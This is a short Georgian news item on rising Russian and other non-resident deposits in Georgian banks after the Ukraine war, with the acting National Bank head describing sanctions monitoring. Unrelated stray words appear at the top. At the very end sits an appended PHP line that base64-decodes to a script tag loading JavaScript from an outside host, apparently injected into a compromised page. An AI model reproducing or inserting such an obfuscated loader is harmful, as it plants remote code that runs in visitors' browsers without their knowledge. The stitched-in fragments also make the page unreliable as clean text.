celsiusi
ავერსი შნაიდერი

რუსეთის რეზიდენტების მიერ საქართველოს კომერციულ ბანკებში თანხები გაიზარდა მას შემდეგ, რაც საომარო მოქმედებები დაიწყო რუსეთმა უკრაინაში, მას შემდეგ გაიზარდა ზოგადად არარეზიდენტების დეპოზიტები საქართველოში და განსაკუთრებით რუსეთიდან, მაგრამ არა მარტო რუსეთიდან, სხვა ქვეყნებიდანაც, – ამის შესახებ ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელმა, არჩილ მესტვირიშვილმა განაცხადა.

მესტვირიშვილის თქმით, ძალიან მნიშვნელოვანია, რომ ეს თანხები არ იყოს დაკავშირებული სანქცირებულ პირებთან.

„კომერციული ბანკები დიდ ყურადღებას აქცევენ, როგორც ანგარიშის გახსნის მომენტში, ისე მომავალში, რადგან შეიძლება, ანგარიშის გახსნის მომენტში არ იყოს პირი სანქცირებული, თუმცა შემდეგ დასანქცირდეს. ამიტომ, ამის ძალიან მკაცრი მონიტორინგი ხდება. ჩვენ ვაკონტროლებთ ბანკებს, თუ რამდენად სწორად და კარგად ახდენენ ამ სანქციების მონიტორინგს. ცალკე განყოფილება შევქმენით ამისთვის და კომერციულმა ბანკებმაც, ზოგმა 15 და ზოგმა ხუთი დამატებით კადრიც აიყვანა, რადგან სანქციების კონტროლი იყოს, რაც შეიძლება ეფექტიანი. ამან რა თქმა უნდა გარკვეული დაბრკოლებები გამოიწვია ბიზნესისთვის, რადგან ლეგიტიმური გადარიცხვები იყო რუსეთიდან, ბელორუსიიდან და ეს, რა თქმა უნდა, ცოტა გვიანდება, ზოგ შემთხვევაში რამდენიმე კვირით, მაგრამ ამას ყველა გაგებით ეკიდება და მინდა, ვთქვა, რომ სანქციების დაცვა ჩვენთვის არის ძალიან მნიშვნელოვანი“, – განაცხადა მესტვირიშვილმა. 

5717
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");